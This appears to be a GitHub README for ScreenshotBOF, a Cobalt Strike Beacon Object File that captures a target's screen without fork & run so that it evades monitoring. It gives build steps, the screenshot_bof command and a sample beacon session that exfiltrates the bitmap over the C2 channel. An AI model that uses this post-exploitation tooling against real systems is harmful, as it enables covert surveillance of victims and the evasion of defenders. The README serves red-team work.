ScreenshotBOF: alternative screenshot capability for Cobalt Strike

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. The screenshot was downloaded in memory.

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behavior provides stability, it is now well-known and heavily monitored. This BOF is meant to provide a more OPSEC-safe version of the screenshot capability.

Self Compilation

1. git clone the repo: git clone
2. open the solution in Visual Studio
3. Build project BOF

Save methods:

0. drop file to disk
1. download file over beacon (Cobalt Strike only)

Usage

1. import the screenshotBOF.cna script into Cobalt Strike
2. use the command screenshot_bof {local filename} {save method 0/1}

   beacon> screenshot_bof sad.bmp 1
   
   [*] Running screenshot BOF by (@codex_tf2)
   
   [+] host called home, sent: 5267 bytes
   
   [+] received output:
   
   [*] Screen saved to bitmap
   
   [+] received output:
   
   [*] Downloading bitmap over beacon with filename sad.bmp
   
   [*] started download of sad.bmp

    

3. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right-clicking the download and clicking “Render BMP” (credit @BinaryFaultline)

Source: https://github.com/CodeXTF2/